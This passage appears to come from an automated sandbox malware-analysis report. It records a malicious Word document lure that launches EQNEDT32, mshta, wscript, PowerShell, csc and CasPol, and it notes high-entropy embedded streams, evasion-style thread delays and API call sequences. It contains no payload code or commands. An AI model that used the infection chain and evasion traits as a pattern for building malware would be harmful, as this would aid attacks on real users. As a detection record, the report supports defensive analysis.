                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: PO NAHK22012FA00000.docx.docStream path 'CONTENTS' entropy: 7.9803126268 (max. 8.0)
                  Source: PO NAHK22012FA00000.docx.docStream path 'CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drStream path '_1791187948/CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drStream path '_1791187949/CONTENTS' entropy: 7.9803126268 (max. 8.0)
                  Source: ~WRD0000.tmp.0.drStream path 'CONTENTS' entropy: 7.94760038357 (max. 8.0)
                  Source: ~WRD0000.tmp.0.drStream path 'CONTENTS' entropy: 7.9803126268 (max. 8.0)

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040F7E2 Sleep,ExitProcess,20_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_008E5F52 sldt word ptr [eax]8_2_008E5F52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3304Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1310Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2051Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5290Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 396Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2345Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8281
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2567
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 6964
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1696
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_20-53641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dllJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3984Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 4088Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 2051 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 5290 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 396 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 2345 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 8281 > 30
